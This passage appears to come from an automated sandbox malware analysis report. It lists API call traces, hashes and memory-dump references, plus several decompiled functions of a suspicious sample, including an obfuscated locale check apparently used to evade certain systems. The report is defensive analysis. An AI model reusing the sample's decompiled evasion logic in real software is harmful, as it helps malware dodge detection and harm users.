        • Part of subcall function 002D482D: RtlLeaveCriticalSection.NTDLL(002DB29C), ref: 002D4873
      • HeapFree.KERNEL32(00000000,?,002DB2D0), ref: 002D1C21
        • Part of subcall function 002D4D19: GetTickCount.KERNEL32(002DA05C,00000000,00000000), ref: 002D4D30
        • Part of subcall function 002D4D19: RtlQueryPerformanceFrequency.NTDLL(?), ref: 002D4D81
        • Part of subcall function 002D4D19: RtlQueryPerformanceCounter.NTDLL(?), ref: 002D4D8B
        • Part of subcall function 002D4D19: _aulldiv.NTDLL(?,?,?,?), ref: 002D4D9D
        • Part of subcall function 002D4D19: GetSystemTimeAsFileTime.KERNELBASE(?), ref: 002D4DB7
        • Part of subcall function 002D4D19: _aulldiv.NTDLL(?,?,00989680,00000000), ref: 002D4DD7
        • Part of subcall function 002D4D19: RtlAllocateHeap.NTDLL(00000000,00000800), ref: 002D4E54
        • Part of subcall function 002D4D19: GetTickCount.KERNELBASE ref: 002D4E65
        • Part of subcall function 002D4D19: RtlEnterCriticalSection.NTDLL(002DB29C), ref: 002D4E79
        • Part of subcall function 002D4D19: RtlLeaveCriticalSection.NTDLL(002DB29C), ref: 002D4E97
        • Part of subcall function 002D4D19: StrTrimA.SHLWAPI(00000000,002DA294), ref: 002D4ECC
        • Part of subcall function 002D4D19: lstrcpy.KERNEL32(?,?), ref: 002D4EEC
        • Part of subcall function 002D4D19: wcstombs.NTDLL ref: 002D4F96
        • Part of subcall function 002D4D19: HeapFree.KERNEL32(00000000,00000008,?), ref: 002D4FED
        • Part of subcall function 002D4D19: HeapFree.KERNEL32(00000000,00000000,00000000), ref: 002D4FFE
        • Part of subcall function 002D4D19: HeapFree.KERNEL32(00000000,?,00000001), ref: 002D500E
        • Part of subcall function 002D4D19: HeapFree.KERNEL32(00000000,?), ref: 002D501E
        • Part of subcall function 002D4D19: HeapFree.KERNEL32(00000000,00000001), ref: 002D502C
      Strings
      Memory Dump Source
      • Source File: 00000001.00000002.3011358454.00000000002D1000.00000020.sdmp, Offset: 002D1000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_1_2_2d1000_zbetcheckin_tracker_propan.jbxd
      Similarity
      • API ID: Heap$Free$CriticalSection$AllocateCountEnterLeavePerformanceQueryTickTime_aulldivmemcpy$CounterFileFrequencySleepSystemTrimlstrcpymemsetwcstombs
      • String ID: Fv
      • API String ID: 3347454254-1370784869
      • Opcode ID: d04ba21adcbe012530ab9cb60ebecd086e4d42c76dbbaaa938fd51d66a594b12
      • Instruction ID: 07395057b0d20c927a6c6c7ed35a3806e64e4db320c42104d19ac9dbf6bff492
      • Opcode Fuzzy Hash: d04ba21adcbe012530ab9cb60ebecd086e4d42c76dbbaaa938fd51d66a594b12
      • Instruction Fuzzy Hash: 47019272620209FBD7019F55EC89F9A3B6CEB48758F100027F905D6360D771ED209BA0
      APIs
      • GetModuleHandleA.KERNEL32(0041804C), ref: 0040FC05
      • TlsAlloc.KERNEL32 ref: 0040FC9E
        • Part of subcall function 0040F850: GetModuleHandleA.KERNEL32(0041804C,?,0040F8BA,00000000,00412290), ref: 0040F889
        • Part of subcall function 0040F850: GetProcAddress.KERNEL32(00000000,0041803C,?,0040F8BA,00000000,00412290), ref: 0040F899
        • Part of subcall function 0040F850: RtlEncodePointer.NTDLL(?,?,0040F8BA,00000000,00412290), ref: 0040F8A7
      • GetCurrentThreadId.KERNEL32 ref: 0040FD68
        • Part of subcall function 0040F952: TlsFree.KERNEL32(0042C494), ref: 0040F97D
        • Part of subcall function 0040F8BC: GetModuleHandleA.KERNEL32(0041804C,?,0040F943,?,?,0040EFA6), ref: 0040F8F5
        • Part of subcall function 0040F8BC: GetProcAddress.KERNEL32(00000000,0041805C,?,0040F943,?,?,0040EFA6), ref: 0040F905
        • Part of subcall function 0040F8BC: RtlDecodePointer.NTDLL(?,?,0040F943,?,?,0040EFA6), ref: 0040F913
        • Part of subcall function 004110D9: Sleep.KERNEL32(00000000), ref: 004110FE
        • Part of subcall function 0040F98F: GetModuleHandleA.KERNEL32(0041804C,?,?,0040EFA6), ref: 0040F9A0
        • Part of subcall function 0040F98F: InterlockedIncrement.KERNEL32(0042C4A8), ref: 0040F9FB
      Memory Dump Source
      • Source File: 00000001.00000002.3011514816.000000000040E000.00000020.sdmp, Offset: 0040E000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_1_2_40e000_zbetcheckin_tracker_propan.jbxd
      Similarity
      • API ID: HandleModule$AddressPointerProc$AllocCurrentDecodeEncodeFreeIncrementInterlockedSleepThread
      • String ID:
      • API String ID: 3963488467-0
      • Opcode ID: 585ddeddb7b52054c9609b37b0de9c137685ef3b7ec3faa75b0f07d8c7479e08
      • Instruction ID: f4645d5930c4b6cfba22fa347c7c0f035c91bb1ae7631caf77b4e8b584b8dd61
      • Opcode Fuzzy Hash: 585ddeddb7b52054c9609b37b0de9c137685ef3b7ec3faa75b0f07d8c7479e08
      • Instruction Fuzzy Hash: 06319172900702BAD731BF75AC07A563FA1AB05794B22953FE804A26F0EB38D4488F5C
      APIs
      • SysAllocString.OLEAUT32(00000000), ref: 002D2435
      • SysFreeString.OLEAUT32(00000000), ref: 002D2449
      • SysFreeString.OLEAUT32(?), ref: 002D2457
      Memory Dump Source
      • Source File: 00000001.00000002.3011358454.00000000002D1000.00000020.sdmp, Offset: 002D1000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_1_2_2d1000_zbetcheckin_tracker_propan.jbxd
      Similarity
      • API ID: String$Free$Alloc
      • String ID:
      • API String ID: 986138563-0
      • Opcode ID: eaf4fffeef193439b6c2299397d3c56f6303675bd231b8611a8a8a59d4a50f1b
      • Instruction ID: fe3d54f4e6fb8138b7d2cfedb2c0d97c8cd8d7a66ffc4ea903945d5a4e272877
      • Opcode Fuzzy Hash: eaf4fffeef193439b6c2299397d3c56f6303675bd231b8611a8a8a59d4a50f1b
      • Instruction Fuzzy Hash: 3131127191024AEFCB01DF98D8848AEBBB5FF54341B21842BF90597310D7759D59CFA2
      APIs
        • Part of subcall function 00401046: HeapAlloc.KERNEL32(00000000,00000000,004028D9,?,00000000,0000000C,?,?,?,?,00401091,?,?,736C6E70,767F1218,0000000C), ref: 00401052
      • GetModuleFileNameW.KERNEL32(?,00000000,00000104,00000208,767F1218,00000000,?,?,00401C28,?,00000001,767F1218,00000000), ref: 004026AB
      • GetModuleFileNameA.KERNEL32(?,00000000,00000104,00000208,767F1218,00000000,?,?,00401C28,?,00000001,767F1218,00000000), ref: 004026B3
      • GetLastError.KERNEL32(?,?,00401C28,?,00000001,767F1218,00000000,?,?,?,?,00401196,?,00000000), ref: 004026F1
        • Part of subcall function 0040105B: HeapFree.KERNEL32(00000000,00000000,00402908), ref: 00401067
      Memory Dump Source
      • Source File: 00000001.00000002.3011495595.0000000000400000.00000040.sdmp, Offset: 00400000, based on PE: true
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_1_2_400000_zbetcheckin_tracker_propan.jbxd
      Similarity
      • API ID: FileHeapModuleName$AllocErrorFreeLast
      • String ID:
      • API String ID: 2988868759-0
      • Opcode ID: e04f2cda87d63690c36d13c71f808de2bff031073c5f079bca8e35168d11a7df
      • Instruction ID: 38005211e0c518f31a1dce85c31ae3552b31d11fcf6732a8a56490fa6ec46b04
      • Opcode Fuzzy Hash: e04f2cda87d63690c36d13c71f808de2bff031073c5f079bca8e35168d11a7df
      • Instruction Fuzzy Hash: 8A014C72900115EBC7316BA98E8CA9F7668AFC1754F150037FA45B72D0EAFDDC8087A9
      APIs
      • SafeArrayCreate.OLEAUT32(00000011,00000001,002DCA98), ref: 002D26F4
      • memcpy.NTDLL(?,002D1C97,00000008), ref: 002D270E
        • Part of subcall function 002D2495: SysFreeString.OLEAUT32(002DCA98,?,?,?,002D2663,?,80000001,002DCA98,002DC268,00000000,002DC0DC,?,00000000,00000000), ref: 002D256C
        • Part of subcall function 002D2495: SysFreeString.OLEAUT32(00000000,?,?,?,002D2663,?,80000001,002DCA98,002DC268,00000000,002DC0DC,?,00000000,00000000), ref: 002D2576
      • SafeArrayDestroy.OLEAUT32(002D1DB8), ref: 002D273A
      Memory Dump Source
      • Source File: 00000001.00000002.3011358454.00000000002D1000.00000020.sdmp, Offset: 002D1000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_1_2_2d1000_zbetcheckin_tracker_propan.jbxd
      Similarity
      • API ID: ArrayFreeSafeString$CreateDestroymemcpy
      • String ID:
      • API String ID: 3778694329-0
      • Opcode ID: 99a601b4c8da7c9dae826a9bc93fed9034ec57e892401271f1f134c189d53dd8
      • Instruction ID: 6ffeef676b6a81e761557bded5ce0154f3412f1965718a7c28ad8e2734627bac
      • Opcode Fuzzy Hash: 99a601b4c8da7c9dae826a9bc93fed9034ec57e892401271f1f134c189d53dd8
      • Instruction Fuzzy Hash: 13014072D10209BFDF119F95DC09ADEBBB9AF14751F108026FA00F6161E3B58E25DB91
      C-Code - Quality: 86%
      			E00401070(void* __ecx, void* __eflags) {
      				void* _v8;
      				char _v12;
      				signed int _t8;
      				signed short _t15;
      				char* _t18;
      				signed int _t19;
      				char* _t25;
      				char* _t29;
      
      				_t22 = __ecx;
      				_push(__ecx);
      				_push(__ecx);
      				_t8 =  *0x405498; // 0x736c6e70
      				_t25 = 0;
      				if(E0040286F(__ecx,  &_v8,  &_v12, _t8 ^ 0x096844fa) != 0) {
      					if(_v8 == 0) {
      						_t29 = 0;
      					} else {
      						_t19 =  *0x405498; // 0x736c6e70
      						_t29 = E00402985(_t22, _v8, _t19 ^ 0x7e4c4e4c);
      					}
      					if(_t29 != 0) {
      						_t15 = E0040270C(_t22); // executed
      						_v12 = _t15 & 0x0000ffff;
      						_t18 = StrStrIA(_t29,  &_v12); // executed
      						if(_t18 != 0) {
      							_t25 = 0x657;
      						}
      					}
      					HeapFree( *0x405440, 0, _v8);
      				}
      				return _t25;
      			}












      APIs
        • Part of subcall function 0040286F: memcpy.NTDLL(00000000,?,?,?,00000000,0000000C,?,?,?,?,00401091,?,?,736C6E70,767F1218,0000000C), ref: 0040294D
      • HeapFree.KERNEL32(00000000,?,?), ref: 004010E1
        • Part of subcall function 0040270C: GetLocaleInfoA.KERNELBASE(00000400,0000005A,00000000,00000004,?,?,004010BC,?,?,736C6E70,767F1218,0000000C,?,?,?,00401178), ref: 00402721
        • Part of subcall function 0040270C: GetSystemDefaultUILanguage.KERNEL32(?,?,004010BC,?,?,736C6E70,767F1218,0000000C,?,?,?,00401178,?,00000000), ref: 0040272B
        • Part of subcall function 0040270C: VerLanguageNameA.KERNEL32(?,00000000,00000004,?,?,004010BC,?,?,736C6E70,767F1218,0000000C,?,?,?,00401178), ref: 0040273E
      • StrStrIA.SHLWAPI(00000000,?), ref: 004010C7
      Strings
      Memory Dump Source
      • Source File: 00000001.00000002.3011495595.0000000000400000.00000040.sdmp, Offset: 00400000, based on PE: true
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_1_2_400000_zbetcheckin_tracker_propan.jbxd
      Similarity
      • API ID: Language$DefaultFreeHeapInfoLocaleNameSystemmemcpy
      • String ID: pnls
      • API String ID: 2738416249-141991303
      • Opcode ID: ee47c91df59879e778880c43149430aba9283b5028a08547e3f01ce58f7cf177
      • Instruction ID: 7ec153cab36ba7075c7ba79943ca731c69473343181f2da809a5a451285e1415
      • Opcode Fuzzy Hash: ee47c91df59879e778880c43149430aba9283b5028a08547e3f01ce58f7cf177
      • Instruction Fuzzy Hash: BC01D476A00104ABC711DB92DE44EDF77ACEB84301F110137BA01F3290DA75DA408AA8
      APIs
      • GetModuleHandleA.KERNEL32(0041804C,?,0040F8BA,00000000,00412290), ref: 0040F889
      • GetProcAddress.KERNEL32(00000000,0041803C,?,0040F8BA,00000000,00412290), ref: 0040F899
      • RtlEncodePointer.NTDLL(?,?,0040F8BA,00000000,00412290), ref: 0040F8A7
      Memory Dump Source
      • Source File: 00000001.00000002.3011514816.000000000040E000.00000020.sdmp, Offset: 0040E000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_1_2_40e000_zbetcheckin_tracker_propan.jbxd
      Similarity
      • API ID: AddressEncodeHandleModulePointerProc
      • String ID:
      • API String ID: 1192658864-0
      • Opcode ID: e1a1faa33349261d61b007e91c188944f8f97be2cb1367989c561306ed197f4b
      • Instruction ID: 213b198e5dd7e5a30d12bdbf8ad6a886c508e8041afcaa9b888406e698b6a230
      • Opcode Fuzzy Hash: e1a1faa33349261d61b007e91c188944f8f97be2cb1367989c561306ed197f4b
      • Instruction Fuzzy Hash: BDF054326042129EDA24FB35DC44EEB3EA4AF083947558476B818E2AF1DB38CC46CA5C
      APIs
      • GetModuleHandleA.KERNEL32(0041804C,?,0040F943,?,?,0040EFA6), ref: 0040F8F5
      • GetProcAddress.KERNEL32(00000000,0041805C,?,0040F943,?,?,0040EFA6), ref: 0040F905
      • RtlDecodePointer.NTDLL(?,?,0040F943,?,?,0040EFA6), ref: 0040F913
      Memory Dump Source
      • Source File: 00000001.00000002.3011514816.000000000040E000.00000020.sdmp, Offset: 0040E000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_1_2_40e000_zbetcheckin_tracker_propan.jbxd
      Similarity
      • API ID: AddressDecodeHandleModulePointerProc
      • String ID:
      • API String ID: 727757147-0
      • Opcode ID: 9749bbe704b7cb80d8c031ef03dc7bf9db3eea0e1109e80d9884c7ba75715e9f
      • Instruction ID: b9744975f3327fb948e758a7dae8ca83f05080644b539119d46011b4a90124de
      • Opcode Fuzzy Hash: 9749bbe704b7cb80d8c031ef03dc7bf9db3eea0e1109e80d9884c7ba75715e9f
      • Instruction Fuzzy Hash: 81F05430604312AED730AB35EC54BAB3EA4AF443507148436B408E26F2CB38DC499A9C
      APIs
        • Part of subcall function 002D23AB: SysAllocString.OLEAUT32(00000000), ref: 002D2435
        • Part of subcall function 002D23AB: SysFreeString.OLEAUT32(00000000), ref: 002D2449
        • Part of subcall function 002D23AB: SysFreeString.OLEAUT32(?), ref: 002D2457
      • SysFreeString.OLEAUT32(002DCA98,?,?,?,002D2663,?,80000001,002DCA98,002DC268,00000000,002DC0DC,?,00000000,00000000), ref: 002D256C
      • SysFreeString.OLEAUT32(00000000,?,?,?,002D2663,?,80000001,002DCA98,002DC268,00000000,002DC0DC,?,00000000,00000000), ref: 002D2576
      Memory Dump Source
      • Source File: 00000001.00000002.3011358454.00000000002D1000.00000020.sdmp, Offset: 002D1000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_1_2_2d1000_zbetcheckin_tracker_propan.jbxd
      Similarity
      • API ID: String$Free$Alloc
      • String ID:
      • API String ID: 986138563-0
      • Opcode ID: 8472e39e88c147e309a0eed49ed0a76ec6b885cdf2cb21149ebd1cdff01d31bf
      • Instruction ID: 8bd109226bd48074fda4831a9d6dd017da6df5cb8c4748974daced30ec2ab3ca
      • Opcode Fuzzy Hash: 8472e39e88c147e309a0eed49ed0a76ec6b885cdf2cb21149ebd1cdff01d31bf
      • Instruction Fuzzy Hash: B9317772900109EFCB25DF68D898C9BBB79EBD97407108599FC159B210D232DD61CBA0
      APIs
      • CoCreateInstance.OLE32(002DC0BC,00000000,00000001,002DC0CC,002D1DB8), ref: 002D2302
      • CoSetProxyBlanket.OLE32(?,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 002D2339
      Memory Dump Source
      • Source File: 00000001.00000002.3011358454.00000000002D1000.00000020.sdmp, Offset: 002D1000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_1_2_2d1000_zbetcheckin_tracker_propan.jbxd
      Similarity
      • API ID: BlanketCreateInstanceProxy
      • String ID:
      • API String ID: 1899829610-0
      • Opcode ID: c31a2e0389df4e051e539ac2bd3c72f11366b752440e79e761c47549ee7a0cfd
      • Instruction ID: 6fd363ccc26608ebff2c8a4a88422e31d94ad1eed726fcc7b1343f48307fb936
      • Opcode Fuzzy Hash: c31a2e0389df4e051e539ac2bd3c72f11366b752440e79e761c47549ee7a0cfd
      • Instruction Fuzzy Hash: 1C015B75611224FBC7109B65CC5DD9F7F6DEB8ABA0F140496F50ADB340DA71AE02CAA0
      APIs
        • Part of subcall function 0040F8BC: GetModuleHandleA.KERNEL32(0041804C,?,0040F943,?,?,0040EFA6), ref: 0040F8F5
        • Part of subcall function 0040F8BC: GetProcAddress.KERNEL32(00000000,0041805C,?,0040F943,?,?,0040EFA6), ref: 0040F905
        • Part of subcall function 0040F8BC: RtlDecodePointer.NTDLL(?,?,0040F943,?,?,0040EFA6), ref: 0040F913
      • GetModuleHandleA.KERNELBASE(00418144), ref: 00411699
      • GetProcAddress.KERNELBASE(00000000,0041811C), ref: 004116A9
        • Part of subcall function 0040F850: GetModuleHandleA.KERNEL32(0041804C,?,0040F8BA,00000000,00412290), ref: 0040F889
        • Part of subcall function 0040F850: GetProcAddress.KERNEL32(00000000,0041803C,?,0040F8BA,00000000,00412290), ref: 0040F899
        • Part of subcall function 0040F850: RtlEncodePointer.NTDLL(?,?,0040F8BA,00000000,00412290), ref: 0040F8A7
      Memory Dump Source
      • Source File: 00000001.00000002.3011514816.000000000040E000.00000020.sdmp, Offset: 0040E000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_1_2_40e000_zbetcheckin_tracker_propan.jbxd
      Similarity
      • API ID: AddressHandleModuleProc$Pointer$DecodeEncode
      • String ID:
      • API String ID: 1393985791-0
      • Opcode ID: 3fa38c983e5ae4e21be3749140712afe6d2bcf6475972416b5a03ab484b2e32f
      • Instruction ID: 10b67c62758283e54975a8c2a8718c2afbb13bd149e7d6db9f50ab6a7734c4d0
      • Opcode Fuzzy Hash: 3fa38c983e5ae4e21be3749140712afe6d2bcf6475972416b5a03ab484b2e32f
      • Instruction Fuzzy Hash: 3901D872D00215ABCB21BF75DC459DE7A71AB44310715827BF515B33B1EB3D49818A6C
      APIs
      • GetVersionExA.KERNEL32(?), ref: 002D4CA4
        • Part of subcall function 002D1000: RtlAllocateHeap.NTDLL(00000000,?,002D4CB5), ref: 002D100C
      • wsprintfA.USER32 ref: 002D4D08
      Memory Dump Source
      • Source File: 00000001.00000002.3011358454.00000000002D1000.00000020.sdmp, Offset: 002D1000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_1_2_2d1000_zbetcheckin_tracker_propan.jbxd
      Similarity
      • API ID: AllocateHeapVersionwsprintf
      • String ID:
      • API String ID: 3641471311-0
      • Opcode ID: aed26a8e293177467a26cfe96790f5e91725b4afc31d5627b97530e9127c776b
      • Instruction ID: c5f75fa170ef4224398aa446529959f1be753088f49b7b31e76e1982b21cb124
      • Opcode Fuzzy Hash: aed26a8e293177467a26cfe96790f5e91725b4afc31d5627b97530e9127c776b
      • Instruction Fuzzy Hash: 5901C472D1122ADBDF11AFA4DC05AFE77F4BB08306F14011AF910E6241E3388D248BA0
      C-Code - Quality: 38%
      			E00401C0F(void* __ecx) {
      				signed int _v8;
      				intOrPtr _v12;
      				intOrPtr _t8;
      				void* _t10;
      				signed int _t12;
      				signed int _t17;
      				intOrPtr* _t21;
      				void* _t24;
      
      				_push(__ecx);
      				_push(__ecx);
      				_t8 = E00402685(__ecx,  *0x405484,  &_v8, 1); // executed
      				_v12 = _t8;
      				if(_t8 != 0) {
      					 *0x40548c =  *0x40548c & 0x00000000;
      				} else {
      					_t17 = _v8;
      					_t21 = __imp__GetLongPathNameW;
      					_t10 =  *_t21(_t17, _t8, _t8); // executed
      					_t24 = _t10;
      					if(_t24 == 0) {
      						L4:
      						 *0x40548c = _t17;
      					} else {
      						_t5 = _t24 + 2; // 0x2
      						_t12 = E00401046(_t24 + _t5);
      						 *0x40548c = _t12;
      						if(_t12 == 0) {
      							goto L4;
      						} else {
      							 *_t21(_t17, _t12, _t24); // executed
      							E0040105B(_t17);
      						}
      					}
      				}
      				return _v12;
      			}












      APIs
        • Part of subcall function 00402685: GetModuleFileNameW.KERNEL32(?,00000000,00000104,00000208,767F1218,00000000,?,?,00401C28,?,00000001,767F1218,00000000), ref: 004026AB
        • Part of subcall function 00402685: GetModuleFileNameA.KERNEL32(?,00000000,00000104,00000208,767F1218,00000000,?,?,00401C28,?,00000001,767F1218,00000000), ref: 004026B3
        • Part of subcall function 00402685: GetLastError.KERNEL32(?,?,00401C28,?,00000001,767F1218,00000000,?,?,?,?,00401196,?,00000000), ref: 004026F1
      • GetLongPathNameW.KERNEL32 ref: 00401C3B
        • Part of subcall function 00401046: HeapAlloc.KERNEL32(00000000,00000000,004028D9,?,00000000,0000000C,?,?,?,?,00401091,?,?,736C6E70,767F1218,0000000C), ref: 00401052
      • GetLongPathNameW.KERNEL32 ref: 00401C59
        • Part of subcall function 0040105B: HeapFree.KERNEL32(00000000,00000000,00402908), ref: 00401067
      Memory Dump Source
      • Source File: 00000001.00000002.3011495595.0000000000400000.00000040.sdmp, Offset: 00400000, based on PE: true
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_1_2_400000_zbetcheckin_tracker_propan.jbxd
      Similarity
      • API ID: Name$FileHeapLongModulePath$AllocErrorFreeLast
      • String ID:
      • API String ID: 2000041143-0
      • Opcode ID: fbca7b0c18db94ee543cb269b1779b2661e24f7169b4c19bb2f4ccf1596d5389
      • Instruction ID: d3e87ff06768e6a7e1fda7decc6c686394161edc76869d1cb1342030556b486c
      • Opcode Fuzzy Hash: fbca7b0c18db94ee543cb269b1779b2661e24f7169b4c19bb2f4ccf1596d5389
      • Instruction Fuzzy Hash: 27F081B1500604BFE710AB66DDC5EBF7AACDB45355B000036F901F62A1E278DD448F78
      APIs
      • GetModuleHandleA.KERNEL32(0041804C,?,?,0040EFA6), ref: 0040F9A0
      • InterlockedIncrement.KERNEL32(0042C4A8), ref: 0040F9FB
      Memory Dump Source
      • Source File: 00000001.00000002.3011514816.000000000040E000.00000020.sdmp, Offset: 0040E000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_1_2_40e000_zbetcheckin_tracker_propan.jbxd
      Similarity
      • API ID: HandleIncrementInterlockedModule
      • String ID:
      • API String ID: 4046927871-0
      • Opcode ID: 181cf96f9878aa2d40397fe430bf17a031a9cbf11847fb4acf0a5ae2794ba46b
      • Instruction ID: fb9e327bc4e86ad3706c899d9e65884dd5987718e2b76837441fe1fa9022f41c
      • Opcode Fuzzy Hash: 181cf96f9878aa2d40397fe430bf17a031a9cbf11847fb4acf0a5ae2794ba46b
      • Instruction Fuzzy Hash: CB115E71940705DFD720AF7AD845B9ABBE0AF48304F10853EE599A3691CB78A9448F68
      APIs
      • SysAllocString.OLEAUT32(?), ref: 002D2682
        • Part of subcall function 002D2495: SysFreeString.OLEAUT32(002DCA98,?,?,?,002D2663,?,80000001,002DCA98,002DC268,00000000,002DC0DC,?,00000000,00000000), ref: 002D256C
        • Part of subcall function 002D2495: SysFreeString.OLEAUT32(00000000,?,?,?,002D2663,?,80000001,002DCA98,002DC268,00000000,002DC0DC,?,00000000,00000000), ref: 002D2576
      • SysFreeString.OLEAUT32(00000000), ref: 002D26B9
      Memory Dump Source
      • Source File: 00000001.00000002.3011358454.00000000002D1000.00000020.sdmp, Offset: 002D1000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_1_2_2d1000_zbetcheckin_tracker_propan.jbxd
      Similarity
      • API ID: String$Free$Alloc
      • String ID:
      • API String ID: 986138563-0
      • Opcode ID: 09021b1d5bbeb9ab137656c55f8afd0c4bc6fffd76df73f091f43d12e320110c
      • Instruction ID: d751d19ae2d945eb4ca0127a847b6731be66642d5a531fb01cda5f497c2d90f1
      • Opcode Fuzzy Hash: 09021b1d5bbeb9ab137656c55f8afd0c4bc6fffd76df73f091f43d12e320110c
      • Instruction Fuzzy Hash: 0EF0A472921209BBCB115F68DC0999F7B78EF58311B104022FD01B1220D370CD2896E2
      APIs
      • HeapCreate.KERNELBASE(00000000,00001000,00000000), ref: 0040ED4C
        • Part of subcall function 0040E1E1: RtlAllocateHeap.NTDLL(00000000,00000140), ref: 0040E1EE
      • HeapDestroy.KERNEL32 ref: 0040ED82
      Memory Dump Source
      • Source File: 00000001.00000002.3011514816.000000000040E000.00000020.sdmp, Offset: 0040E000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_1_2_40e000_zbetcheckin_tracker_propan.jbxd
      Similarity
      • API ID: Heap$AllocateCreateDestroy
      • String ID:
      • API String ID: 316229882-0
      • Opcode ID: bd0873f8e6bb77115fc3093740917aeb563906a716937f92d067742f24ba8ebf
      • Instruction ID: 180c67e53c48d7ee7fcfb374972431bf06498a8ed9b27042e88693ef51ef3f03
      • Opcode Fuzzy Hash: bd0873f8e6bb77115fc3093740917aeb563906a716937f92d067742f24ba8ebf
      • Instruction Fuzzy Hash: 0AE09B3165D303BADB017B725D057273694EB00346F018C77F405D42E0E7788560591D
      C-Code - Quality: 100%
      			E0040ED3B(void* __ebx, void* __edx, void* __edi, intOrPtr _a4) {
      				void* _t6;
      				intOrPtr _t7;
      				void* _t10;
      				void* _t15;
      
      				_t15 = __edx;
      				_t6 = HeapCreate(0 | _a4 == 0x00000000, 0x1000, 0); // executed
      				 *0x436214 = _t6;
      				if(_t6 != 0) {
      					_t7 = E0040ECE0(__ebx, _t15, __edi, __eflags);
      					__eflags = _t7 - 3;
      					 *0x436be0 = _t7;
      					if(_t7 != 3) {
      						L5:
      						__eflags = 1;
      						return 1;
      					} else {
      						_t10 = E0040E1E1(0x3f8);
      						__eflags = _t10;
      						if(_t10 != 0) {
      							goto L5;
      						} else {
      							HeapDestroy( *0x436214);
      							 *0x436214 =  *0x436214 & 0x00000000;
      							goto L1;
      						}
      					}
      				} else {
      					L1:
      					return 0;
      				}
      			}








      APIs
      • HeapCreate.KERNELBASE(00000000,00001000,00000000,0040C908,00000001), ref: 0040ED4C
        • Part of subcall function 0040E1E1: HeapAlloc.KERNEL32(00000000,00000140,0040ED77,000003F8), ref: 0040E1EE
      • HeapDestroy.KERNEL32 ref: 0040ED82
      Memory Dump Source
      • Source File: 00000001.00000001.2574848852.0000000000401000.00000020.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000001.00000001.2574309266.0000000000400000.00000002.sdmp
      • Associated: 00000001.00000001.2582924768.0000000000417000.00000002.sdmp
      • Associated: 00000001.00000001.2590538102.000000000042C000.00000004.sdmp
      • Associated: 00000001.00000001.2591421495.0000000000436000.00000004.sdmp
      • Associated: 00000001.00000001.2591956442.0000000000437000.00000002.sdmp
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_1_1_400000_zbetcheckin_tracker_propan.jbxd
      Similarity
      • API ID: Heap$AllocCreateDestroy
      • String ID:
      • API String ID: 2236781399-0
      • Opcode ID: bd0873f8e6bb77115fc3093740917aeb563906a716937f92d067742f24ba8ebf
      • Instruction ID: 180c67e53c48d7ee7fcfb374972431bf06498a8ed9b27042e88693ef51ef3f03
      • Opcode Fuzzy Hash: bd0873f8e6bb77115fc3093740917aeb563906a716937f92d067742f24ba8ebf
      • Instruction Fuzzy Hash: 0AE09B3165D303BADB017B725D057273694EB00346F018C77F405D42E0E7788560591D
      APIs
      • InterlockedIncrement.KERNEL32(002DB1F4), ref: 002D113E
        • Part of subcall function 002D102A: HeapCreate.KERNELBASE(00000000,00400000,00000000), ref: 002D1037
        • Part of subcall function 002D102A: GetTickCount.KERNEL32 ref: 002D104E
        • Part of subcall function 002D102A: GetModuleHandleA.KERNEL32(002DC09F,?,?,?), ref: 002D1089
        • Part of subcall function 002D102A: GetProcAddress.KERNEL32(00000000,002DC8D6,?,?,?), ref: 002D109A
        • Part of subcall function 002D102A: IsWow64Process.KERNELBASE(002DB208,?,?,?,?), ref: 002D10B2
      • InterlockedDecrement.KERNEL32(002DB1F4), ref: 002D115E
        • Part of subcall function 002D10D5: SetEvent.KERNEL32(002DB220), ref: 002D10E0
        • Part of subcall function 002D10D5: SleepEx.KERNEL32(00000064,00000001), ref: 002D10EF
        • Part of subcall function 002D10D5: CloseHandle.KERNEL32(002DB220), ref: 002D1110
        • Part of subcall function 002D10D5: HeapDestroy.KERNEL32(002DB1F0), ref: 002D1120
      Memory Dump Source
      • Source File: 00000001.00000002.3011358454.00000000002D1000.00000020.sdmp, Offset: 002D1000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_1_2_2d1000_zbetcheckin_tracker_propan.jbxd
      Similarity
      • API ID: HandleHeapInterlocked$AddressCloseCountCreateDecrementDestroyEventIncrementModuleProcProcessSleepTickWow64
      • String ID:
      • API String ID: 3503610136-0
      • Opcode ID: 2de2a2ba4a3a166a871c01a05a9bf37b6fac0e232b15b0501cc804e00cfb9113
      • Instruction ID: 05ffe57c944f14598614bf24c00286ea153ca196c9c0fdb77cf42fe46d6cee53
      • Opcode Fuzzy Hash: 2de2a2ba4a3a166a871c01a05a9bf37b6fac0e232b15b0501cc804e00cfb9113
      • Instruction Fuzzy Hash: F5E04F21634173B79B212F659C09F6BA6509B10BC1B018517FAC8D1B90D752CCB086A2
      APIs
      • GetModuleHandleA.KERNEL32(00417A74), ref: 0040E1BD
      • GetProcAddress.KERNEL32(00000000,00417A58), ref: 0040E1CD
      Memory Dump Source
      • Source File: 00000001.00000002.3011514816.000000000040E000.00000020.sdmp, Offset: 0040E000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_1_2_40e000_zbetcheckin_tracker_propan.jbxd
      Similarity
      • API ID: AddressHandleModuleProc
      • String ID:
      • API String ID: 1646373207-0
      • Opcode ID: 5c8b0a2a3fd0743bf04907dc865b83f30a7debde992b96672e13496cb7125439
